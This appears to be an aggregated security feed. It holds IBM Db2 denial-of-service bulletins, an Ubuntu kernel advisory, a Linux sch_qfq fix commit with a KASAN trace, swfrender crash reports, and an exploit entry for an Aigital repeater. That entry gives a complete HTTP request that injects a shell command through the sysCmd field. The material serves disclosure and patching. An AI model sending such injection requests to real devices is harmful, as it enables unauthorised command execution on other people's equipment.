IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.1 and 11.5 is vulnerable to a denial of service as the server may crash when compiling a specially crafted SQL query using a LIMIT clause.  IBM X-Force ID:  247864.

  

**Summary**

IBM® Db2® is vulnerable to a denial of service as the server may crash when using a specially crafted SQL query using a LIMIT clause.

**Vulnerability Details**

**CVEID:**   CVE-2023-26021  
**DESCRIPTION:**   IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) is vulnerable to a denial of service as the server may crash when compiling a specially crafted SQL query using a LIMIT clause.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/247864 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**Affected Products and Versions**

All fix pack levels of IBM Db2  V11.1, and V11.5 server editions on all platforms are affected. 

IBM Db2 V10.5 is not affected.

  

**Remediation/Fixes**

Customers running any vulnerable fixpack level of an affected Program,  v11.1 and V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for each impacted release:  V11.1.4 FP7, v11.5.7 and V11.5.8. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.

**Release**

**Fixed in fix pack**

**APAR**

**Download URL**

V11.1

TBD

DT160619

Special Build for V11.1.4 FP7:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Solaris 64-bit, SPARC  
Windows 32-bit, x86  
Windows 64-bit, x86

V11.5

TBD

DT160619

Special Build for V11.5.7:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Windows 32-bit, x86  
Windows 64-bit, x86

Special Build for V11.5.8:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Windows 32-bit, x86  
Windows 64-bit, x86

IBM does not disclose key Db2 functionality nor replication steps for a vulnerability to avoid providing too much information to any potential malicious attacker. IBM does not want to enable a malicious attacker with sufficient knowledge to craft an exploit of the vulnerability.

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

24 Apr 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSEPGG","label":"Db2 for Linux, UNIX and Windows"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"},{"code":"PF016","label":"Linux"},{"code":"PF033","label":"Windows"},{"code":"PF027","label":"Solaris"}\],"Version":"11.5,11.1","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

CVE-2023-26021: IBM® Db2® is vulnerable to a denial of service as the server may crash when compiling a specially crafted SQL query using a LIMIT clause. (CVE-2023-26021)

IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) is vulnerable to a denial of service as the server may crash when an Out of Memory occurs using the DBMS_OUTPUT module.  IBM X-Force ID:  247868.

CVE-2023-26022: IBM Db2 denial of service CVE-2023-26022 Vulnerability Report

IBM Db2 for Linux, UNIX and Windows (includes DB2 Connect Server) 11.5 is vulnerable to a denial of service when attempting to use ACR client affinity for unfenced DRDA federation wrappers.  IBM X-Force ID:  249187.

  

**Summary**

IBM® Db2® is vulnerable to a denial of service as the server may crash when when attempting to use ACR client affinity for unfenced DRDA federation wrappers.

**Vulnerability Details**

**CVEID:**   CVE-2023-27555  
**DESCRIPTION:**   IBM Db2 for Linux, UNIX and Windows (includes DB2 Connect Server) is vulnerable to a denial of service when attempting to use ACR client affinity for unfenced DRDA federation wrappers.  
CVSS Base score: 5.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/249187 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)

**Affected Products and Versions**

All fix pack levels of IBM Db2 V11.5 server editions on all platforms are affected. 

IBM Db2 V11.1 and 10.5 are not affected.

  

**Remediation/Fixes**

Customers running any vulnerable fixpack level of an affected Program,  V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for each impacted release:  v11.5.7 and V11.5.8. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.

**Release**

**Fixed in fix pack**

**APAR**

**Download URL**

V11.5

TBD

DT188887

Special Build for V11.5.7:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Windows 32-bit, x86  
Windows 64-bit, x86

 Special Build for V11.5.8:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Windows 32-bit, x86  
Windows 64-bit, x86

IBM does not disclose key Db2 functionality nor replication steps for a vulnerability to avoid providing too much information to any potential malicious attacker. IBM does not want to enable a malicious attacker with sufficient knowledge to craft an exploit of the vulnerability.

**Workarounds and Mitigations**

Remove the unsupported options from the db2dsdriver.cfg configuration for the federated data source. If the configuration cannot be changed because it shared with other applications then provide a separate configuration for the federated data source.

**References**

Off

**Change History**

24 Apr 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSEPGG","label":"Db2 for Linux, UNIX and Windows"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"},{"code":"PF016","label":"Linux"},{"code":"PF033","label":"Windows"},{"code":"PF027","label":"Solaris"}\],"Version":"11.5","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

CVE-2023-27555: IBM® Db2® is vulnerable to a denial of service as the server may crash when when attempting to use ACR client affinity for unfenced DRDA federation wrappers. (CVE-2023-27555)

IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.1, 11.1, and 11.5 is vulnerable to a denial of service.  Under rare conditions, setting a special register may cause the Db2 server to terminate abnormally.  IBM X-Force ID:  247862.

CVE-2023-25930: IBM X-Force Exchange

Ubuntu Security Notice 6047-1 - It was discovered that the Traffic-Control Index implementation in the Linux kernel did not properly perform filter deactivation in some situations. A local attacker could possibly use this to gain elevated privileges. Please note that with the fix for this CVE, kernel support for the TCINDEX classifier has been removed.

    ==========================================================================Ubuntu Security Notice USN-6047-1April 27, 2023linux, linux-aws, linux-aws-5.4, linux-azure, linux-azure-4.15,linux-azure-5.4, linux-gcp, linux-gcp-4.15, linux-gcp-5.4, linux-gke,linux-gkeop, linux-hwe, linux-hwe-5.4, linux-ibm, linux-kvm, linux-oracle,linux-oracle-5.4 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS- Ubuntu 16.04 ESM- Ubuntu 14.04 ESMSummary:The system could be made to run programs as an administrator.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-kvm: Linux kernel for cloud environments- linux-oracle: Linux kernel for Oracle Cloud systems- linux-aws-5.4: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-4.15: Linux kernel for Microsoft Azure Cloud systems- linux-azure-5.4: Linux kernel for Microsoft Azure cloud systems- linux-gcp-4.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-gcp-5.4: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe-5.4: Linux hardware enablement (HWE) kernel- linux-oracle-5.4: Linux kernel for Oracle Cloud systems- linux-hwe: Linux hardware enablement (HWE) kernelDetails:It was discovered that the Traffic-Control Index (TCINDEX) implementationin the Linux kernel did not properly perform filter deactivation in somesituations. A local attacker could possibly use this to gain elevatedprivileges. Please note that with the fix for this CVE, kernel support forthe TCINDEX classifier has been removed.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   linux-image-5.4.0-1048-ibm      5.4.0-1048.53   linux-image-5.4.0-1068-gkeop    5.4.0-1068.72   linux-image-5.4.0-1090-kvm      5.4.0-1090.96   linux-image-5.4.0-1098-gke      5.4.0-1098.105   linux-image-5.4.0-1100-oracle   5.4.0-1100.109   linux-image-5.4.0-1101-aws      5.4.0-1101.109   linux-image-5.4.0-1104-gcp      5.4.0-1104.113   linux-image-5.4.0-1107-azure    5.4.0-1107.113   linux-image-5.4.0-148-generic   5.4.0-148.165   linux-image-5.4.0-148-generic-lpae  5.4.0-148.165   linux-image-5.4.0-148-lowlatency  5.4.0-148.165   linux-image-aws-lts-20.04       5.4.0.1101.98   linux-image-azure-lts-20.04     5.4.0.1107.100   linux-image-gcp-lts-20.04       5.4.0.1104.106   linux-image-generic             5.4.0.148.146   linux-image-generic-hwe-18.04   5.4.0.148.146   linux-image-generic-hwe-18.04-edge  5.4.0.148.146   linux-image-generic-lpae        5.4.0.148.146   linux-image-generic-lpae-hwe-18.04  5.4.0.148.146   linux-image-generic-lpae-hwe-18.04-edge  5.4.0.148.146   linux-image-gke                 5.4.0.1098.103   linux-image-gke-5.4             5.4.0.1098.103   linux-image-gkeop               5.4.0.1068.66   linux-image-gkeop-5.4           5.4.0.1068.66   linux-image-ibm                 5.4.0.1048.74   linux-image-ibm-lts-20.04       5.4.0.1048.74   linux-image-kvm                 5.4.0.1090.84   linux-image-lowlatency          5.4.0.148.146   linux-image-oem                 5.4.0.148.146   linux-image-oem-osp1            5.4.0.148.146   linux-image-oracle-lts-20.04    5.4.0.1100.93   linux-image-virtual             5.4.0.148.146Ubuntu 18.04 LTS:   linux-image-4.15.0-1118-oracle  4.15.0-1118.129   linux-image-4.15.0-1139-kvm     4.15.0-1139.144   linux-image-4.15.0-1149-gcp     4.15.0-1149.165   linux-image-4.15.0-1164-azure   4.15.0-1164.179   linux-image-4.15.0-210-generic  4.15.0-210.221   linux-image-4.15.0-210-generic-lpae  4.15.0-210.221   linux-image-4.15.0-210-lowlatency  4.15.0-210.221   linux-image-5.4.0-1100-oracle   5.4.0-1100.109~18.04.1   linux-image-5.4.0-1101-aws      5.4.0-1101.109~18.04.1   linux-image-5.4.0-1104-gcp      5.4.0-1104.113~18.04.1   linux-image-5.4.0-1107-azure    5.4.0-1107.113~18.04.1   linux-image-5.4.0-148-generic   5.4.0-148.165~18.04.1   linux-image-5.4.0-148-generic-lpae  5.4.0-148.165~18.04.1   linux-image-5.4.0-148-lowlatency  5.4.0-148.165~18.04.1   linux-image-aws                 5.4.0.1101.79   linux-image-azure               5.4.0.1107.80   linux-image-azure-lts-18.04     4.15.0.1164.132   linux-image-gcp                 5.4.0.1104.80   linux-image-gcp-lts-18.04       4.15.0.1149.163   linux-image-generic             4.15.0.210.193   linux-image-generic-hwe-18.04   5.4.0.148.165~18.04.119   linux-image-generic-lpae        4.15.0.210.193   linux-image-generic-lpae-hwe-18.04  5.4.0.148.165~18.04.119   linux-image-kvm                 4.15.0.1139.130   linux-image-lowlatency          4.15.0.210.193   linux-image-lowlatency-hwe-18.04  5.4.0.148.165~18.04.119   linux-image-oem                 5.4.0.148.165~18.04.119   linux-image-oem-osp1            5.4.0.148.165~18.04.119   linux-image-oracle              5.4.0.1100.109~18.04.72   linux-image-oracle-lts-18.04    4.15.0.1118.123   linux-image-snapdragon-hwe-18.04  5.4.0.148.165~18.04.119   linux-image-virtual             4.15.0.210.193   linux-image-virtual-hwe-18.04   5.4.0.148.165~18.04.119Ubuntu 16.04 ESM:   linux-image-4.15.0-1118-oracle  4.15.0-1118.129~16.04.1   linux-image-4.15.0-1149-gcp     4.15.0-1149.165~16.04.1   linux-image-4.15.0-1164-azure   4.15.0-1164.179~16.04.1   linux-image-4.15.0-210-generic  4.15.0-210.221~16.04.1   linux-image-4.15.0-210-lowlatency  4.15.0-210.221~16.04.1   linux-image-azure               4.15.0.1164.148   linux-image-gcp                 4.15.0.1149.139   linux-image-generic-hwe-16.04   4.15.0.210.195   linux-image-gke                 4.15.0.1149.139   linux-image-lowlatency-hwe-16.04  4.15.0.210.195   linux-image-oem                 4.15.0.210.195   linux-image-oracle              4.15.0.1118.99   linux-image-virtual-hwe-16.04   4.15.0.210.195Ubuntu 14.04 ESM:   linux-image-4.15.0-1164-azure   4.15.0-1164.179~14.04.1   linux-image-azure               4.15.0.1164.130After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6047-1   CVE-2023-1829Package Information:   https://launchpad.net/ubuntu/+source/linux/5.4.0-148.165   https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1101.109   https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1107.113   https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1104.113   https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1098.105   https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1068.72   https://launchpad.net/ubuntu/+source/linux-ibm/5.4.0-1048.53   https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1090.96   https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1100.109   https://launchpad.net/ubuntu/+source/linux/4.15.0-210.221   https://launchpad.net/ubuntu/+source/linux-aws-5.4/5.4.0-1101.109~18.04.1   https://launchpad.net/ubuntu/+source/linux-azure-4.15/4.15.0-1164.179   https://launchpad.net/ubuntu/+source/linux-azure-5.4/5.4.0-1107.113~18.04.1   https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1149.165   https://launchpad.net/ubuntu/+source/linux-gcp-5.4/5.4.0-1104.113~18.04.1   https://launchpad.net/ubuntu/+source/linux-hwe-5.4/5.4.0-148.165~18.04.1   https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1139.144   https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1118.129   https://launchpad.net/ubuntu/+source/linux-oracle-5.4/5.4.0-1100.109~18.04.1

Ubuntu Security Notice USN-6047-1

Aigital Wireless-N Repeater version Mini_Router.0.131229 suffers from a remote command execution vulnerability.

    # Exploit Title: Aigital Wireless-N Repeater - Command Injection# Exploit Author: Matteo Mandolini# Date : 13/04/2023# Vendor Homepage: https://web.archive.org/web/20220625053314/https://www.aigital.com/# Version: Mini_Router.0.131229Command InjectionPOST /boafrm/formSysCmd HTTP/1.1Host: 192.168.10.253User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 31Origin: http://192.168.10.253Connection: closeReferer: http://192.168.10.253/setok.htmUpgrade-Insecure-Requests: 1sysCmd=ping+-c10+192.168.10.101

Aigital Wireless-N Repeater Mini_Router.0.131229 Remote Command Execution

qfq_change_class in net/sched/sch_qfq.c in the Linux kernel before 6.2.13 allows an out-of-bounds write because lmax can exceed QFQ_MIN_LMAX.

Permalink

Browse files

Browse the repository at this point in the history

net: sched: sch\_qfq: prevent slab-out-of-bounds in qfq\_activate\_agg

If the TCA\_QFQ\_LMAX value is not offered through nlattr, lmax is determined by the MTU value of the network device.
The MTU of the loopback device can be set up to 2^31-1.
As a result, it is possible to have an lmax value that exceeds QFQ\_MIN\_LMAX.

Due to the invalid lmax value, an index is generated that exceeds the QFQ\_MAX\_INDEX(=24) value, causing out-of-bounds read/write errors.

The following reports a oob access:

\[   84.582666\] BUG: KASAN: slab-out-of-bounds in qfq\_activate\_agg.constprop.0 (net/sched/sch\_qfq.c:1027 net/sched/sch\_qfq.c:1060 net/sched/sch\_qfq.c:1313)
\[   84.583267\] Read of size 4 at addr ffff88810f676948 by task ping/301
\[   84.583686\]
\[   84.583797\] CPU: 3 PID: 301 Comm: ping Not tainted 6.3.0-rc5 #1
\[   84.584164\] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
\[   84.584644\] Call Trace:
\[   84.584787\]  <TASK>
\[   84.584906\] dump\_stack\_lvl (lib/dump\_stack.c:107 (discriminator 1))
\[   84.585108\] print\_report (mm/kasan/report.c:320 mm/kasan/report.c:430)
\[   84.585570\] kasan\_report (mm/kasan/report.c:538)
\[   84.585988\] qfq\_activate\_agg.constprop.0 (net/sched/sch\_qfq.c:1027 net/sched/sch\_qfq.c:1060 net/sched/sch\_qfq.c:1313)
\[   84.586599\] qfq\_enqueue (net/sched/sch\_qfq.c:1255)
\[   84.587607\] dev\_qdisc\_enqueue (net/core/dev.c:3776)
\[   84.587749\] \_\_dev\_queue\_xmit (./include/net/sch\_generic.h:186 net/core/dev.c:3865 net/core/dev.c:4212)
\[   84.588763\] ip\_finish\_output2 (./include/net/neighbour.h:546 net/ipv4/ip\_output.c:228)
\[   84.589460\] ip\_output (net/ipv4/ip\_output.c:430)
\[   84.590132\] ip\_push\_pending\_frames (./include/net/dst.h:444 net/ipv4/ip\_output.c:126 net/ipv4/ip\_output.c:1586 net/ipv4/ip\_output.c:1606)
\[   84.590285\] raw\_sendmsg (net/ipv4/raw.c:649)
\[   84.591960\] sock\_sendmsg (net/socket.c:724 net/socket.c:747)
\[   84.592084\] \_\_sys\_sendto (net/socket.c:2142)
\[   84.593306\] \_\_x64\_sys\_sendto (net/socket.c:2150)
\[   84.593779\] do\_syscall\_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)
\[   84.593902\] entry\_SYSCALL\_64\_after\_hwframe (arch/x86/entry/entry\_64.S:120)
\[   84.594070\] RIP: 0033:0x7fe568032066
\[   84.594192\] Code: 0e 0d 00 f7 d8 64 89 02 48 c7 c0 ff ff ff ff eb b8 0f 1f 00 41 89 ca 64 8b 04 25 18 00 00 00 85 c09\[ 84.594796\] RSP: 002b:00007ffce388b4e8 EFLAGS: 00000246 ORIG\_RAX: 000000000000002c

Code starting with the faulting instruction
===========================================
\[   84.595047\] RAX: ffffffffffffffda RBX: 00007ffce388cc70 RCX: 00007fe568032066
\[   84.595281\] RDX: 0000000000000040 RSI: 00005605fdad6d10 RDI: 0000000000000003
\[   84.595515\] RBP: 00005605fdad6d10 R08: 00007ffce388eeec R09: 0000000000000010
\[   84.595749\] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000040
\[   84.595984\] R13: 00007ffce388cc30 R14: 00007ffce388b4f0 R15: 0000001d00000001
\[   84.596218\]  </TASK>
\[   84.596295\]
\[   84.596351\] Allocated by task 291:
\[   84.596467\] kasan\_save\_stack (mm/kasan/common.c:46)
\[   84.596597\] kasan\_set\_track (mm/kasan/common.c:52)
\[   84.596725\] \_\_kasan\_kmalloc (mm/kasan/common.c:384)
\[   84.596852\] \_\_kmalloc\_node (./include/linux/kasan.h:196 mm/slab\_common.c:967 mm/slab\_common.c:974)
\[   84.596979\] qdisc\_alloc (./include/linux/slab.h:610 ./include/linux/slab.h:731 net/sched/sch\_generic.c:938)
\[   84.597100\] qdisc\_create (net/sched/sch\_api.c:1244)
\[   84.597222\] tc\_modify\_qdisc (net/sched/sch\_api.c:1680)
\[   84.597357\] rtnetlink\_rcv\_msg (net/core/rtnetlink.c:6174)
\[   84.597495\] netlink\_rcv\_skb (net/netlink/af\_netlink.c:2574)
\[   84.597627\] netlink\_unicast (net/netlink/af\_netlink.c:1340 net/netlink/af\_netlink.c:1365)
\[   84.597759\] netlink\_sendmsg (net/netlink/af\_netlink.c:1942)
\[   84.597891\] sock\_sendmsg (net/socket.c:724 net/socket.c:747)
\[   84.598016\] \_\_\_\_sys\_sendmsg (net/socket.c:2501)
\[   84.598147\] \_\_\_sys\_sendmsg (net/socket.c:2557)
\[   84.598275\] \_\_sys\_sendmsg (./include/linux/file.h:31 net/socket.c:2586)
\[   84.598399\] do\_syscall\_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)
\[   84.598520\] entry\_SYSCALL\_64\_after\_hwframe (arch/x86/entry/entry\_64.S:120)
\[   84.598688\]
\[   84.598744\] The buggy address belongs to the object at ffff88810f674000
\[   84.598744\]  which belongs to the cache kmalloc-8k of size 8192
\[   84.599135\] The buggy address is located 2664 bytes to the right of
\[   84.599135\]  allocated 7904-byte region \[ffff88810f674000, ffff88810f675ee0)
\[   84.599544\]
\[   84.599598\] The buggy address belongs to the physical page:
\[   84.599777\] page:00000000e638567f refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x10f670
\[   84.600074\] head:00000000e638567f order:3 entire\_mapcount:0 nr\_pages\_mapped:0 pincount:0
\[   84.600330\] flags: 0x200000000010200(slab|head|node=0|zone=2)
\[   84.600517\] raw: 0200000000010200 ffff888100043180 dead000000000122 0000000000000000
\[   84.600764\] raw: 0000000000000000 0000000080020002 00000001ffffffff 0000000000000000
\[   84.601009\] page dumped because: kasan: bad access detected
\[   84.601187\]
\[   84.601241\] Memory state around the buggy address:
\[   84.601396\]  ffff88810f676800: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
\[   84.601620\]  ffff88810f676880: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
\[   84.601845\] >ffff88810f676900: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
\[   84.602069\]                                               ^
\[   84.602243\]  ffff88810f676980: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
\[   84.602468\]  ffff88810f676a00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
\[   84.602693\] ==================================================================
\[   84.602924\] Disabling lock debugging due to kernel taint

Fixes: 3015f3d ("pkt\_sched: enable QFQ to support TSO/GSO")
Reported-by: Gwangun Jung <exsociety@gmail.com>
Signed-off-by: Gwangun Jung <exsociety@gmail.com>
Acked-by: Jamal Hadi Salim<jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>

*   Loading branch information

CVE-2023-31436: net: sched: sch_qfq: prevent slab-out-of-bounds in qfq_activate_agg · torvalds/linux@3037933

swfrender v0.9.2 was discovered to contain a heap buffer overflow in the function enumerateUsedIDs_fillstyle at modules/swftools.c

**1.heap-buffer-overflow****env**

ubuntu20.04

gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)

swfrender - part of swftools 0.9.2

**sample**

id7\_heap-buffer-overflow.zip

**crash**

    ./swfrender id7_heap-buffer-overflow -o /dev/null
    ==1106906==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6070000003eb at pc 0x557c2e072578 bp 0x7ffd975b4940 sp 0x7ffd975b4930
    READ of size 1 at 0x6070000003eb thread T0
        #0 0x557c2e072577 in enumerateUsedIDs_fillstyle modules/swftools.c:509
        #1 0x557c2e0728d1 in enumerateUsedIDs_styles modules/swftools.c:565
        #2 0x557c2e05c7d9 in swf_ParseShapeData modules/swfshape.c:692
        #3 0x557c2e06020d in swf_ShapeToShape2 modules/swfshape.c:884
        #4 0x557c2e04c298 in extractDefinitions readers/swf.c:375
        #5 0x557c2e04c298 in swf_open readers/swf.c:736
        #6 0x557c2e04800a in main /mnt/hgfs/ubuntu/cve/swftools/swftools-master/src/swfrender.c:174
        #7 0x7f8c197fa082 in __libc_start_main ../csu/libc-start.c:308
        #8 0x557c2e046ecd in _start (/mnt/hgfs/ubuntu/cve/swftools/swftools-master/src/swfrender+0x24ecd)
    
    0x6070000003eb is located 0 bytes to the right of 75-byte region [0x6070000003a0,0x6070000003eb)
    allocated by thread T0 here:
        #0 0x7f8c19c40808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
        #1 0x557c2e0e4ab9 in rfx_alloc /mnt/hgfs/ubuntu/cve/swftools/swftools-master/lib/mem.c:30
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow modules/swftools.c:509 in enumerateUsedIDs_fillstyle
    Shadow bytes around the buggy address:
      0x0c0e7fff8020: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa 00 00
      0x0c0e7fff8030: 00 00 00 00 00 00 03 fa fa fa fa fa 00 00 00 00
      0x0c0e7fff8040: 00 00 00 00 03 fa fa fa fa fa 00 00 00 00 00 00
      0x0c0e7fff8050: 00 00 03 fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c0e7fff8060: 00 00 fa fa fa fa 00 00 00 00 00 00 00 00 00 04
    =>0x0c0e7fff8070: fa fa fa fa 00 00 00 00 00 00 00 00 00[03]fa fa
      0x0c0e7fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==1106906==ABORTING
    

**2.negative-size-param****env**

ubuntu20.04

gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)

swfrender - part of swftools 0.9.2

**sample**

id107\_negative-size-param.zip

**crash**

    ./swfrender id107_negative-size-param -o /dev/null
    =1148866==ERROR: AddressSanitizer: negative-size-param: (size=-21465837888)
        #0 0x7fe31237dfdd in __interceptor_memset ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762
        #1 0x559b516b3c75 in memset /usr/include/x86_64-linux-gnu/bits/string_fortified.h:71
        #2 0x559b516b3c75 in newclip devices/render.c:538
        #3 0x559b516b41e1 in render_startpage devices/render.c:936
        #4 0x559b516348e1 in main /mnt/hgfs/ubuntu/cve/swftools/swftools-master/src/swfrender.c:217
        #5 0x7fe311fdd082 in __libc_start_main ../csu/libc-start.c:308
        #6 0x559b51632ecd in _start (/mnt/hgfs/ubuntu/cve/swftools/swftools-master/src/swfrender+0x24ecd)
    
